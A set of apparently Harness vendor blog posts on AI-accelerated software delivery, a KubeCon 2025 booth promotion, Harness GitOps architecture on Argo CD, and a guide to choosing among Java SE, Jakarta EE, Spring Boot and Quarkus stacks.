
Over the last few years, something fundamental has changed in software development.
If the early 2020s were about adopting AI coding assistants, the next phase is about what happens after those tools accelerate development. Teams are producing code faster than ever. But what I’m hearing from engineering leaders is a different question:
What’s going to break next?
That question is exactly what led us to commission our latest research, State of DevOps Modernization 2026. The results reveal a pattern that many practitioners already sense intuitively: faster code generation is exposing weaknesses across the rest of the software delivery lifecycle.
In other words, AI is multiplying development velocity, but it’s also revealing the limits of the systems we built to ship that code safely.
One of the most striking findings in the research is what we call the AI Velocity Paradox, a term we coined in our 2025 State of Software Engineering Report.
Teams using AI coding tools most heavily are shipping code significantly faster. In fact, 45% of developers who use AI coding tools multiple times per day deploy to production daily or faster, compared to 32% of daily users and just 15% of weekly users.
At first glance, that sounds like a huge success story. Faster iteration cycles are exactly what modern software teams want.
But the data tells a more complicated story.
Among those same heavy AI users:
What this tells me is simple: AI is speeding up the front of the delivery pipeline, but the rest of the system isn’t scaling with it. It’s like running trains faster than the tracks were built to handle. Friction builds, the ride gets bumpy, and disaster starts to feel close.

The result is downstream friction: more incidents, more manual work, and more operational stress on engineering teams.
To understand why this is happening, you have to step back and look at how most DevOps systems actually evolved.
Over the past 15 years, delivery pipelines have grown incrementally. Teams added tools to solve specific problems: CI servers, artifact repositories, security scanners, deployment automation, and feature management. Each step made sense at the time.
But the overall system was rarely designed as a coherent whole.
In many organizations today, quality gates, verification steps, and incident recovery still rely heavily on human coordination and manual work. In fact, 77% say teams often have to wait on other teams for routine delivery tasks.
That model worked when release cycles were slower.
It doesn’t work as well when AI dramatically increases the number of code changes moving through the system.
Think of it this way: If AI doubles the number of changes engineers can produce, your pipelines must either:
Otherwise, the system begins to crack under pressure. The burden often falls directly on developers to help deploy services safely, certify compliance checks, and keep rollouts continuously progressing. When failures happen, they have to jump in and remediate at whatever hour.
These manual tasks, naturally, inhibit innovation and cause developer burnout. That’s exactly what the research shows.
Across respondents, developers report spending roughly 36% of their time on repetitive manual tasks like chasing approvals, rerunning failed jobs, or copy-pasting configuration.
As delivery speed increases, so does that operational load.
The good news is that this problem isn’t mysterious. It’s a systems problem. And systems problems can be solved.
From our experience working with engineering organizations, we've identified a few principles that consistently help teams scale AI-driven development safely.
When every team builds pipelines differently, scaling delivery becomes difficult.
Standardized templates (or “golden paths”) make it easier to deploy services safely and consistently. They also dramatically reduce the cognitive load for developers.
Speed only works when feedback is fast.
Automating security, compliance, and quality checks earlier in the lifecycle ensures problems are caught before they reach production. That keeps pipelines moving without sacrificing safety.
Feature flags, automated rollbacks, and progressive rollouts allow teams to decouple deployment from release. That flexibility reduces the blast radius of new changes and makes experimentation safer.
It also allows teams to move faster without increasing production risk.
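To make the idea of decoupling deployment from release concrete, here is a minimal sketch of a percentage-based feature flag. The class name `PercentageFlag` and the flag and user identifiers are hypothetical, and this is not how any particular feature management product works internally. It only illustrates the principle: the code is already deployed, and a stable hash decides which users actually see it.

```java
import java.nio.charset.StandardCharsets;
import java.util.zip.CRC32;

/** Percentage-based flag: code is deployed everywhere, released to a slice of users. */
final class PercentageFlag {
    private final String flagName;
    private final int rolloutPercent; // 0..100

    PercentageFlag(String flagName, int rolloutPercent) {
        if (rolloutPercent < 0 || rolloutPercent > 100) {
            throw new IllegalArgumentException("rolloutPercent must be between 0 and 100");
        }
        this.flagName = flagName;
        this.rolloutPercent = rolloutPercent;
    }

    /** Maps a user to a stable bucket in [0, 100) so the same user always gets the same answer. */
    static int bucketFor(String flagName, String userId) {
        CRC32 crc = new CRC32();
        crc.update((flagName + ":" + userId).getBytes(StandardCharsets.UTF_8));
        return (int) (crc.getValue() % 100);
    }

    /** A user is in the release when their bucket falls below the rollout percentage. */
    boolean isEnabledFor(String userId) {
        return bucketFor(flagName, userId) < rolloutPercent;
    }
}
```

Because the bucket is derived from the flag name and user ID, raising the percentage only ever adds users to the release, and setting it to 0 acts as an instant off switch without a redeploy.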
Automation alone doesn’t solve the problem. What matters is creating a feedback loop: deploy → observe → measure → iterate.
When teams can measure the real-world impact of changes, they can learn faster and improve continuously.
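The deploy → observe → measure → iterate loop can be sketched in a few lines. This is an illustration under stated assumptions, not a description of any product's verification engine: `observeErrorRate` is a hypothetical hook standing in for whatever metrics source you use, and the traffic steps and threshold are made-up values.

```java
import java.util.List;
import java.util.function.IntToDoubleFunction;

/** Sketch of a deploy -> observe -> measure -> iterate loop for a progressive rollout. */
final class RolloutLoop {
    enum Outcome { PROMOTED, ROLLED_BACK }

    /**
     * Walks through traffic steps (for example 5, 25, 50, 100 percent).
     * observeErrorRate is a hypothetical hook that returns the error rate
     * measured while the given percentage of traffic hits the new version.
     */
    static Outcome run(List<Integer> trafficSteps,
                       IntToDoubleFunction observeErrorRate,
                       double maxErrorRate) {
        for (int percent : trafficSteps) {
            double errorRate = observeErrorRate.applyAsDouble(percent); // observe + measure
            if (errorRate > maxErrorRate) {
                return Outcome.ROLLED_BACK; // stop early to limit the blast radius
            }
            // iterate: this step passed, so exposure widens on the next pass
        }
        return Outcome.PROMOTED;
    }
}
```

The design choice worth noting is that the decision to continue is made from measured data at every step, not from a one-time approval before the rollout starts.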
AI is already changing how software gets written. The next challenge is changing how software gets delivered.
Coding assistants have increased development teams' capacity to innovate. But to capture the full benefit, the delivery systems behind them must evolve as well.
The organizations that succeed in this new environment will be the ones that treat software delivery as a coherent system, not just a collection of tools.
Because the real goal isn’t just writing code faster. It’s learning faster, delivering safer, and turning engineering velocity into better outcomes for the business.
And that requires modernizing the entire pipeline, not just the part where code is written.

KubeCon 2025 Atlanta is here! For the next four days, Atlanta is the undisputed center of the cloud native universe. The buzz is palpable, but this year, one topic seems to be hanging over every keynote, session, and hallway track: AI.
We've all seen the impressive demos. But as developers and engineers, we have to ask the hard questions. Can AI actually help us ship code better? Can it make our complex CI/CD pipelines safer, faster, and more intelligent? Or is it just another layer of hype we have to manage?
At Harness, we believe AI is the key to solving software delivery's biggest challenges. And we're not just talking about it. We're here to show you the code with Harness AI, purpose-built to bring intelligence and automation to every step of the delivery process.
We are thrilled to team up with Google Cloud to present a special lightning talk on Agentic AI and its practical use in CI/CD. This is where the hype stops and the engineering begins.
Join our Director of Product Marketing, Chinmay Gaikwad, for this deep-dive session.

Chinmay will be on hand to demonstrate how Agentic AI is moving from a concept to a practical, powerful tool for building and securing enterprise-grade pipelines. Be sure to stop by, ask questions, and get personalized guidance.
AI is our big theme, but we're everywhere this week, focusing on the core problems you face. Here's where to find us.
1. Main Event: The Harness Home Base (Nov 11-13)
This is our command center. Come by Booth #522 to see live demos of our Agentic AI in action. You can also talk to our engineers about the full Harness platform, including how we integrate with OpenTofu, empower platform engineering teams, and help you get a handle on cloud costs. Plus, we have the best swag at the show.
2. Co-located Event: Platform Engineering Day (Nov 10)
As a Platinum Sponsor, we're kicking off the week with a deep focus on building Internal Developer Platforms (IDPs). Stop by Booth #Z45 to chat about building "golden paths" that developers will actually love and how to prove the value of your platform.
3. Co-located Event: OpenTofu Day (Nov 10)
We are incredibly proud to be a Gold Sponsor of OpenTofu Day. As one of the top contributors to the OpenTofu project, our engineers are in the trenches helping shape the future of open-source Infrastructure as Code.
The momentum is undeniable:
Our engineers have contributed major features like the AzureRM backend rewrite and the new Azure Key Provider, and we serve on the Technical Steering Committee. Come find us in Room B203 to meet the team and talk all things IaC.
Can't wait? Download the digital copy of The Practical Guide to Modernizing Infrastructure Delivery and AI-Native Software Delivery right now.
KubeCon 2025 Atlanta is about what's next. This year, "what's next" is practical AI, smarter platforms, and open collaboration. We're at the center of all three.
See you on the floor!

Harness GitOps builds on the Argo CD model by packaging a Harness GitOps Agent with Argo CD components and integrating them into the Harness platform. The result is a GitOps architecture that preserves the Argo reconciliation loop while adding visibility, audit, and control through Harness SaaS.
At the center of the architecture is the Argo CD cluster, sometimes called the control cluster. This is where both the Harness GitOps Agent and Argo CD’s core components run:
The control cluster can be deployed in two models:
The Argo CD Application Controller applies manifests to one or more target clusters by talking to their Kubernetes API servers.
Developers push declarative manifests (YAML, Helm, or Kustomize) into a Git repository. The GitOps Agent and repo-server fetch these manifests. The Application Controller continuously reconciles the cluster state against the desired state. Importantly, clusters never push changes back into Git. The repository remains the single source of truth. Harness configuration, including pipeline definitions, can also be stored in Git, providing a consistent Git-based experience.
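The reconciliation idea is easier to see in code. The sketch below is a toy model, not Argo CD's implementation: it represents each resource as a name and a manifest hash (both hypothetical simplifications) and computes what would have to change in the cluster to match Git. Notice that the flow is one-directional: Git is only ever read.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeSet;

/** Toy reconciliation: compare desired state (from Git) with live state and list the changes. */
final class Reconciler {
    /**
     * Both maps go from resource name to a manifest hash. These types are
     * illustrative; Argo CD compares full Kubernetes manifests, not hashes.
     */
    static List<String> plan(Map<String, String> desired, Map<String, String> live) {
        List<String> actions = new ArrayList<>();
        TreeSet<String> names = new TreeSet<>(desired.keySet());
        names.addAll(live.keySet());
        for (String name : names) {
            String want = desired.get(name);
            String have = live.get(name);
            if (have == null) {
                actions.add("create " + name);
            } else if (want == null) {
                actions.add("delete " + name); // resource no longer declared in Git
            } else if (!want.equals(have)) {
                actions.add("update " + name);
            }
        }
        return actions; // an empty list means the cluster is in sync
    }
}
```

Running `plan` repeatedly against the latest Git revision is the essence of continuous reconciliation: drift shows up as a non-empty plan, and a synced cluster produces no actions.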
While the GitOps loop runs entirely in the control cluster and target clusters, the GitOps Agent makes outbound-only connections to Harness SaaS.
Harness SaaS provides:
All sensitive configuration data, such as repository credentials, certificates, and cluster secrets, remains in the GitOps Agent’s namespace as Kubernetes Secrets and ConfigMaps. Harness SaaS only stores a metadata snapshot of the GitOps setup (Applications, ApplicationSets, Clusters, Repositories, etc.), never the sensitive data itself. Unlike some SaaS-first approaches, Harness never requires secrets to leave your cluster.

In short: a developer commits, Argo fetches and reconciles, and the GitOps Agent reports status back to Harness SaaS for governance and visibility.
This is the pure GitOps architecture: Git defines the desired state, Argo CD enforces it, and Harness provides governance and observability without altering the core reconciliation model.

Most organizations operate more than one Kubernetes cluster, often spread across multiple environments and regions. In this model, each region has its own Argo CD control cluster. The control cluster runs the Harness GitOps Agent alongside core Argo CD components and reconciles the desired state into one or more target clusters such as dev, QA, or prod.
The flow is straightforward:
Harness SaaS aggregates data from all control clusters, giving teams a single view and a single place to drive rollouts:
This setup preserves the familiar Argo CD reconciliation loop inside each control cluster while extending it with Harness’ governance, observability, and promotion pipelines across regions.
Note: Some enterprises run multiple Argo CD control clusters per region for scale or isolation. Harness SaaS can aggregate across any number of clusters, whether you have two or two hundred.
Harness GitOps lets you scale from single clusters to a fleet-wide GitOps model with unified dashboards, governance, and pipelines that promote with confidence and roll back everything when needed. Ready to see it in your stack? Get started with Harness GitOps and bring enterprise-grade control to your Argo CD deployments.


When you're architecting an enterprise Java application, one decision quietly shapes everything downstream: runtime footprint, deployment pipelines, and how your platform team handles incidents at 3 a.m. For two decades, that decision was framed as Java SE vs Java EE. In 2026, that framing has quietly inverted.
Nearly every modern enterprise Java app runs on Java SE 21 or 25 LTS. The real choice now sits one layer up: which framework or runtime sits on top of the JVM. Spring Boot. Quarkus. Helidon. Micronaut. Vanilla Jakarta EE on Open Liberty, Payara, or WildFly. These options have converged on the same underlying APIs. Spring Boot 3 and 4 sit on jakarta.* packages, the same namespace Jakarta EE itself uses. But they differ sharply in startup time, memory footprint, deployment topology, and what your CI/CD pipeline has to do to ship them safely.
This guide is for the platform engineer, architect, or staff engineer who needs to make that call once and live with it across dozens of services. We'll cover what changed, where the stacks still diverge, and how to standardize delivery across a mixed Java fleet without forcing consolidation no team wants.
Java SE (Standard Edition) is the foundation of every Java application, from a five-line script to a globally distributed system. It's the language, the runtime, and the core libraries every Java program assumes is there.
But describing Java SE as just "the foundation" undersells what's happened to it in the last three years. Java SE in 2026 is not the Java SE of 2018.
At its core, Java SE includes:
These pieces form the runtime baseline that every Java framework, including Spring Boot, Quarkus, and Jakarta EE implementations, sits on top of.
If you've been away from the platform for a few years, four changes are worth knowing about before you make any architectural decisions:
Virtual threads (stable in Java 21). Project Loom collapsed the cost of a thread from megabytes of stack to a few hundred bytes. A single JVM can now run millions of concurrent virtual threads. This is the biggest concurrency change in Java's history and it removes the main argument for reactive frameworks like WebFlux on most workloads. Blocking code is fast again.
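Here is a small sketch of what "blocking code is fast again" looks like in practice. It requires Java 21 or later. The class name, the task count, and the 50 ms sleep (a stand-in for a blocking I/O call) are illustrative assumptions, not a benchmark.

```java
import java.time.Duration;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;

final class VirtualThreadDemo {
    /** Runs taskCount blocking tasks, one virtual thread each, and returns how many completed. */
    static int runBlockingTasks(int taskCount) {
        AtomicInteger completed = new AtomicInteger();
        try (ExecutorService executor = Executors.newVirtualThreadPerTaskExecutor()) {
            for (int i = 0; i < taskCount; i++) {
                executor.submit(() -> {
                    Thread.sleep(Duration.ofMillis(50)); // stands in for a blocking I/O call
                    return completed.incrementAndGet();
                });
            }
        } // close() waits until every submitted task has finished
        return completed.get();
    }

    public static void main(String[] args) {
        System.out.println(runBlockingTasks(10_000) + " tasks completed");
    }
}
```

The code is plain, sequential, blocking Java. The only change from a classic thread pool is the executor factory, which is why virtual threads are attractive for existing imperative codebases.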
AOT compilation and native images. GraalVM native image and the JDK's own ahead-of-time caching turn Java apps into binaries that start in tens of milliseconds and use a fraction of the memory of a warm JVM. This used to be a Quarkus or Micronaut differentiator. It's now table stakes across the ecosystem, including Spring Boot 3+.
Records, sealed classes, and pattern matching. The boilerplate that used to push teams toward Lombok or Kotlin is mostly gone. Data-oriented programming in modern Java looks closer to Scala or Kotlin than to Java 8.
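A short sketch shows how these three features combine. The payment domain and every type name here are hypothetical, chosen only to illustrate the style. It needs Java 21 or later for pattern matching in `switch`.

```java
/** A closed set of payment outcomes, modeled as data. */
sealed interface PaymentResult permits Approved, Declined, Pending {}

record Approved(String authCode) implements PaymentResult {}
record Declined(String reason) implements PaymentResult {}
record Pending(int retryAfterSeconds) implements PaymentResult {}

final class PaymentMessages {
    static String describe(PaymentResult result) {
        // The switch is exhaustive: the compiler knows every permitted subtype,
        // so no default branch is needed.
        return switch (result) {
            case Approved a -> "approved with code " + a.authCode();
            case Declined d -> "declined: " + d.reason();
            case Pending p when p.retryAfterSeconds() > 60 -> "pending, check back later";
            case Pending p -> "pending, retry in " + p.retryAfterSeconds() + "s";
        };
    }
}
```

If a fourth outcome is later added to the `permits` clause, `describe` stops compiling until it handles the new case, which is the kind of safety teams previously reached for other languages to get.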
Performance work in Java 25 LTS and beyond. In Java 25, compact object headers shrink object overhead by roughly 22% on heap-heavy workloads. Java 26 follows with a redesigned card table for the G1 garbage collector that delivers measurable throughput gains on reference-heavy code.
Plain Java SE is honest about its scope. It does not give you:
You can build all of these by hand. Almost no one does. In practice, "I'm using Java SE" in 2026 means "I'm using Java SE plus a framework that supplies the missing pieces." That framework is the actual decision, which is where the rest of this guide focuses.
Jakarta EE is the modern successor to Java EE, the standardized set of APIs and specifications for building enterprise-scale Java applications. If you wrote enterprise Java between 2000 and 2017, you wrote Java EE. Everything since 2018 is Jakarta EE.
The name change wasn't cosmetic. It came with a migration that every Java team upgrading in 2026 still has to plan for.
Oracle transferred Java EE to the Eclipse Foundation in 2017. The platform was renamed Jakarta EE because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under new governance.
Then came the breaking change. Starting with Jakarta EE 9 (2020), every package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. The change was mechanical, but it touched every file in every Jakarta EE codebase on the planet, and it forced every framework that depended on those APIs to publish a major-version break.
This is why Spring Boot 3 (late 2022) was a hard upgrade. Spring Boot 3 dropped javax.* and adopted jakarta.*. Any Spring Boot 2.x application moving to 3.x or 4.x has to migrate the namespace. Tools like Eclipse Transformer and OpenRewrite automate most of it, but the migration is still the gating event for many platform upgrades happening in 2026.
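To show why the rename is "mechanical" yet still needs care, here is a deliberately naive sketch of the rewrite. It is not how Eclipse Transformer or OpenRewrite work, and the package list is a partial, illustrative subset. The key detail is that only the packages that moved to Jakarta EE are rewritten: packages such as `javax.sql` and `javax.crypto` are part of Java SE and keep their names.

```java
import java.util.List;

/** Naive illustration of the javax.* to jakarta.* rename; not a replacement for real tooling. */
final class NamespaceMigrator {
    // A partial, illustrative list. Packages such as javax.sql or javax.crypto
    // belong to Java SE and must stay as they are.
    private static final List<String> MOVED_PACKAGES = List.of(
            "javax.persistence", "javax.servlet", "javax.ws.rs",
            "javax.inject", "javax.validation", "javax.enterprise");

    static String migrateLine(String line) {
        for (String oldPackage : MOVED_PACKAGES) {
            String newPackage = "jakarta" + oldPackage.substring("javax".length());
            line = line.replace(oldPackage + ".", newPackage + ".");
        }
        return line;
    }
}
```

A blanket search-and-replace of `javax.` would break Java SE imports, which is one reason to rely on purpose-built migration tools for anything beyond a toy codebase.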
Jakarta EE 11, released in 2025, is the current stable platform. Jakarta EE 12 is in development. The headline specifications most teams interact with are:
If you're a Spring developer, several of these will look familiar. That's not coincidence. Spring's annotations and patterns shaped Jakarta EE's modernization, and Jakarta EE's specifications now define the underlying APIs Spring builds on. The two ecosystems converged.
A common objection to Jakarta EE is that it's too heavy for microservices. Jakarta EE 10 answered this directly with the Core Profile: a minimal subset of specifications (CDI Lite, JAX-RS, JSON-P, JSON-B, Annotations, Interceptors, Dependency Injection) explicitly designed for lightweight cloud-native runtimes and AOT compilation.
The Core Profile is what runtimes like Quarkus implement when they want Jakarta EE compatibility without the full platform's footprint. It's the answer to "Jakarta EE doesn't fit in a container." It does. The original critique was about WebSphere and WebLogic, not about Jakarta EE the specification.
In 2026, picking Jakarta EE doesn't mean picking a multi-gigabyte application server. The runtimes teams actually choose are:
The legacy "heavyweight Java EE" stereotype belongs to WebSphere full profile and WebLogic. Those are real products with real footprints, but in 2026 they're an active migration target, not a forward choice for new development.

Figure: Modern enterprise Java is a layered stack. Frameworks and runtimes pick their packaging and opinions, but they all sit on the same jakarta.* API surface and the same JVM.
By this point in the article, the framing should be obvious: Spring Boot, Quarkus, Helidon, Micronaut, and vanilla Jakarta EE on Open Liberty or Payara are not five different platforms. They're five different opinions sitting on the same jakarta.* APIs and the same JVM. So how do teams actually decide?
In practice, four signals do most of the work.
Signal 1: What does the rest of your fleet run?
The single biggest predictor of which stack a new service uses is which stack the team's other services already use. This is not laziness. It's a sound platform decision. Two services on the same framework share build tooling, base container images, observability libraries, configuration patterns, deployment templates, and on-call runbooks. A team running 40 Spring Boot services will pay a real operational tax to introduce a Quarkus service, even if Quarkus is technically the better fit for that one workload.
The exception is when the new workload has a specific profile that the existing stack genuinely can't serve well. A Spring Boot shop building one event-driven function that needs to scale to zero on AWS Lambda has a legitimate reason to reach for Quarkus or a native Spring Boot image. A Jakarta EE shop building one async data-processing service has a legitimate reason to reach for Spring Boot's mature integration ecosystem. The decision rule is not "best tool for the job in isolation," it's "best tool given what we already operate."
Signal 2: What's the deployment target?
The deployment target matters more than most architecture discussions admit. Three patterns dominate:
Signal 3: What's the team's reactive vs imperative bias?
Five years ago, this was a religious debate. Virtual threads have mostly settled it for new code. But existing services that are already reactive don't get a free migration, and teams that have built fluency with Project Reactor, RxJava, or Mutiny will keep getting value from those investments.
The practical guidance:
Signal 4: How much governance do you need?
This is the question that quietly distinguishes Jakarta EE from Spring Boot in regulated environments. Jakarta EE is a specification with multiple compatible implementations. A regulated bank or insurer can require "any Jakarta EE 11 compatible runtime" in a procurement document and have meaningful vendor portability. Spring Boot is a single implementation, stewarded by a single vendor (VMware, now part of Broadcom). That's fine for most teams. It's a real consideration for organizations with compliance requirements around vendor lock-in.
Quarkus, Helidon, and Open Liberty all sit on the Jakarta EE side of this line because they implement Jakarta EE specifications. Spring Boot does not, despite using jakarta.* packages. The distinction matters less than it used to, but it has not gone away.
The takeaway
The convergence at the API layer means most teams can pick any of these stacks and ship perfectly good software. The choice is no longer a technology bet. It's a fit-to-fleet, fit-to-deployment-target, and fit-to-governance-model decision. The teams that get this wrong are the ones still litigating it as a technology choice.
Stack choice does not end at deployment. It shapes how your services emit telemetry, how incidents propagate, and how quickly your platform team can pin down the root cause when something breaks at 2 a.m. The convergence story makes parts of this easier (shared APIs mean shared observability standards) and parts of it harder (mixed fleets mean more surface area for incidents to hide in).
Three operational realities worth thinking through.
The 2026 platform team rarely operates a single-framework fleet. Most enterprise Java estates look like this: a long tail of Spring Boot services, a growing edge of Quarkus or native-compiled services for cold-start-sensitive workloads, and a stable core of older Jakarta EE applications running on Open Liberty, Payara, or WildFly. Sometimes a few WebLogic or WebSphere systems are still in active modernization.
This mix is fine. It reflects real organizational decisions made over time. But it means your reliability strategy cannot assume framework homogeneity. Health endpoint conventions, log formats, metric names, and tracing instrumentation differ across these stacks unless you actively unify them. The teams that struggle most with incident response are the ones who let each service team pick its own conventions.
OpenTelemetry has become the cross-stack standard for traces, metrics, and logs in enterprise Java. Spring Boot, Quarkus, Helidon, Micronaut, and most Jakarta EE runtimes all ship with OpenTelemetry instrumentation either built-in or one dependency away. This is genuinely good news for platform teams.
The catch: standardization at the protocol layer does not give you standardization at the convention layer. Two services emitting OpenTelemetry traces can still tag spans with completely different attribute names. Two services emitting metrics can still use different naming conventions for the same operation. AI SRE platforms perform best when the signals they ingest are semantically consistent. That consistency is a platform-engineering decision, not a framework decision.
The practical guidance: pick a single OpenTelemetry semantic convention (the OTel HTTP and database conventions are reasonable defaults) and enforce it across stacks through your shared observability libraries. The framework choice does not matter as much as whether you've made the convention choice at all.
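One way a shared observability library might enforce a single convention is to normalize attribute names before export. The sketch below uses plain maps instead of the OpenTelemetry SDK to stay self-contained. The canonical names follow the stable OpenTelemetry HTTP semantic conventions, while the rename table is an illustrative subset and `httpStatus` is a hypothetical team-specific name.

```java
import java.util.LinkedHashMap;
import java.util.Map;

/** Rewrites legacy span attribute keys to one agreed convention before export. */
final class AttributeNormalizer {
    // Legacy key -> canonical key. The targets follow the stable OpenTelemetry
    // HTTP semantic conventions; the table itself is an illustrative subset.
    private static final Map<String, String> RENAMES = Map.of(
            "http.method", "http.request.method",
            "http.status_code", "http.response.status_code",
            "httpStatus", "http.response.status_code"); // hypothetical team-specific name

    static Map<String, Object> normalize(Map<String, Object> attributes) {
        Map<String, Object> normalized = new LinkedHashMap<>();
        // putIfAbsent keeps the first value if two legacy keys map to the same canonical key
        attributes.forEach((key, value) ->
                normalized.putIfAbsent(RENAMES.getOrDefault(key, key), value));
        return normalized;
    }
}
```

Putting this logic in one shared library, rather than in each service, is what turns a convention from a wiki page into something the fleet actually follows.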
A typical Spring Boot service on the JVM takes 2 to 5 seconds to start, hits steady-state CPU and memory after another 30 to 60 seconds of JIT warmup, and produces meaningful traces and metrics throughout. A Quarkus native binary starts in under 100 milliseconds and reaches steady state immediately. These are different operational profiles. They produce different incident patterns.
Spring Boot deployments tend to fail visibly during startup or warmup. Native deployments tend to fail at build time or never. Spring Boot scaling events are slower and more forgiving. Native scaling events are faster but more brittle when something is wrong with the binary itself. AI SRE platforms detect anomalies based on baselines, and your baselines should reflect the runtime profile of the service being monitored. A 3-second startup that is normal for a JVM service is a critical anomaly for a native service.
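The point about profile-specific baselines can be sketched as follows. The thresholds are illustrative upper bounds taken from the ranges quoted above, and the type names are hypothetical. A real platform would learn baselines from each service's own history instead of hard-coding them.

```java
import java.time.Duration;
import java.util.Map;

final class StartupBaselines {
    enum RuntimeProfile { JVM, NATIVE }

    // Illustrative upper bounds based on the ranges quoted above; real baselines
    // would be learned from each service's own history.
    private static final Map<RuntimeProfile, Duration> MAX_EXPECTED_STARTUP = Map.of(
            RuntimeProfile.JVM, Duration.ofSeconds(5),
            RuntimeProfile.NATIVE, Duration.ofMillis(100));

    /** The same observation can be normal for one profile and anomalous for another. */
    static boolean isAnomalous(RuntimeProfile profile, Duration observedStartup) {
        return observedStartup.compareTo(MAX_EXPECTED_STARTUP.get(profile)) > 0;
    }
}
```

With these assumed thresholds, a 3-second startup is unremarkable for the `JVM` profile and flagged for the `NATIVE` profile, which matches the distinction drawn above.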
This is where AI SRE platforms like Harness AI SRE become operationally meaningful. In a single-framework fleet, a senior SRE can mostly hold the operational model in their head. In a mixed fleet of 50 to 500 services across Spring Boot, Quarkus, and legacy Jakarta EE, no human can. The questions AI SRE answers well are exactly the questions mixed-fleet teams ask:
These questions are tractable for AI when the underlying telemetry is consistent. They are intractable for humans regardless of telemetry quality. That's the operational case for treating AI SRE as platform infrastructure rather than as a tool individual teams adopt.
The framework choice shapes the data. The platform decision is what you do with it.
See how Harness AI SRE correlates incidents across mixed Java fleets.
The honest answer to "which Java stack should we use" depends on what you're building, what you already operate, and what your deployment target looks like. The matrix below is opinionated and concrete. Use it as a starting point, not a final answer.
Choose when:
Avoid when:
Current version baseline: Spring Boot 4.0 (released late 2025), running on Java 21 or 25 LTS. Spring Boot 3.x remains a reasonable choice for teams not ready to upgrade Spring Framework to 7.
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Neither of these is a forward choice in 2026. Both are real products with real production footprints, but new development on them is rare outside very specific enterprise circumstances. If you're running WebSphere full profile or WebLogic, the relevant question is the modernization path: typically Open Liberty (the IBM-supported migration target from WebSphere) or Helidon and WildFly (common WebLogic migration targets).
If you've read this far and the matrix still feels like five reasonable options, default to one of two answers:
For everything else, the matrix above is a tiebreaker. The decision rule that beats every other rule is: pick the framework your platform team can operate well at 2 a.m.
The article has been pushing toward one conclusion: in 2026, most enterprise Java estates are mixed-framework by design, and the platform team's job is to make that mix operable rather than to force consolidation.
What that looks like concretely:
A Spring Boot core handles the long tail of CRUD services and customer-facing APIs. A handful of Quarkus or native Spring Boot services sit at the edges where cold start matters: serverless functions, event handlers, scale-to-zero workloads. A stable set of Jakarta EE applications on Open Liberty or Payara handles the deeply-integrated systems that have been running reliably for years and would cost more to rewrite than to maintain. Java 21 is the floor across all of it, with a planned migration to Java 25 LTS over the next 12 to 18 months.
This is not an architectural compromise. It is the correct answer for organizations that have grown over time and have services with genuinely different operational profiles. The mistake is treating the mix as a problem to solve rather than an environment to operate.
When a team proposes adding a new service to the fleet, four questions separate good decisions from defaults:
These questions matter more than any framework comparison because they're the questions a senior platform engineer asks before writing the first line of code. The frameworks themselves have converged enough that the operational fit dominates the technical fit.
The four questions at the end of the previous section all point at the same operational problem. A platform team running a mixed-framework Java fleet faces the same delivery bottleneck regardless of which frameworks are in the mix: ticket-ops and pipeline sprawl that compound with every new service.
The frameworks have converged. The pipelines have not. Most enterprise Java teams still operate one CI/CD configuration for Spring Boot, a different one for Quarkus, a third for Jakarta EE on Open Liberty or Payara, and a long tail of bespoke automation for whatever legacy systems are still in flight. Every new service adds operational surface area. Every framework upgrade creates a coordination problem.
This is the layer where AI-powered continuous delivery and GitOps practices stop being aspirational and become structural. Pull-based deployments through GitOps eliminate the manual approval steps that previously gated Spring Boot rollouts but not Quarkus ones. Policy as Code guardrails enforce the same release strategies, security requirements, and resource limits across every framework in the fleet. Automated verification catches deployment anomalies against each service's own baseline, whether that baseline is a 3-second JVM startup or a 50-millisecond native cold start. Intelligent rollbacks protect production without requiring on-call engineers to remember which framework needs which recovery playbook.
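As a rough illustration of framework-agnostic guardrails, consider the sketch below. It is not the syntax of any real policy engine, and the `Deployment` record, its fields, and the three rules are all hypothetical. What it shows is the shape of the idea: the policy inspects the deployment request and never branches on which framework produced the artifact.

```java
import java.util.ArrayList;
import java.util.List;

final class DeliveryPolicy {
    /** Hypothetical, framework-agnostic view of a deployment request. */
    record Deployment(String service, String framework, String strategy,
                      boolean imageScanned, int memoryLimitMb) {}

    /** Returns the list of violations; an empty list means the deployment may proceed. */
    static List<String> evaluate(Deployment d) {
        List<String> violations = new ArrayList<>();
        if (!d.imageScanned()) {
            violations.add("image must pass a security scan");
        }
        if (!List.of("canary", "blue-green").contains(d.strategy())) {
            violations.add("strategy must be canary or blue-green");
        }
        if (d.memoryLimitMb() <= 0) {
            violations.add("memory limit must be set");
        }
        return violations; // note: d.framework() is never consulted
    }
}
```

A Spring Boot service and a Quarkus native service pass or fail on exactly the same rules, so adding a new framework to the fleet does not add a new set of release rules to maintain.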
The platform decision is no longer which Java framework to standardize on. It's how to operate the mix you already have without paying a coordination tax on every change.
Java SE is the language, JVM, and core libraries every Java application runs on. Jakarta EE is a set of standardized APIs (CDI, Jakarta Persistence, Jakarta REST, Servlet, Jakarta Data, and others) that extend Java SE for enterprise applications. In 2026, the choice is rarely between Java SE and Jakarta EE directly. It's between frameworks and runtimes (Spring Boot, Quarkus, Helidon, Micronaut, Open Liberty, Payara, WildFly) that all sit on Java SE and most of which implement or interoperate with the Jakarta EE specifications.
Jakarta EE is the direct successor to Java EE under new governance at the Eclipse Foundation. Oracle transferred Java EE to Eclipse in 2017 and the platform was renamed because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under the new name. Jakarta EE 11 (2025) is the current stable version.
Starting with Jakarta EE 9 in 2020, every Jakarta EE package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. Spring Boot 3 (late 2022) and Spring Boot 4 both require the new namespace, which means any Spring Boot 2.x application upgrading to 3.x has to migrate every affected import. Tools like Eclipse Transformer and OpenRewrite automate most of the migration, but it remains the gating event for many platform upgrades happening in 2026.
For most greenfield services, Spring Boot is the path of least resistance because of its ecosystem and hiring advantages. Choose a Jakarta EE runtime like Quarkus when cold start time and memory footprint are your dominant operational costs, when you need native compilation as a first-class concern, or when procurement requires multi-vendor specification compatibility. The technical capabilities have largely converged. The decision is mostly about ecosystem fit, deployment target, and what your platform team already operates well.
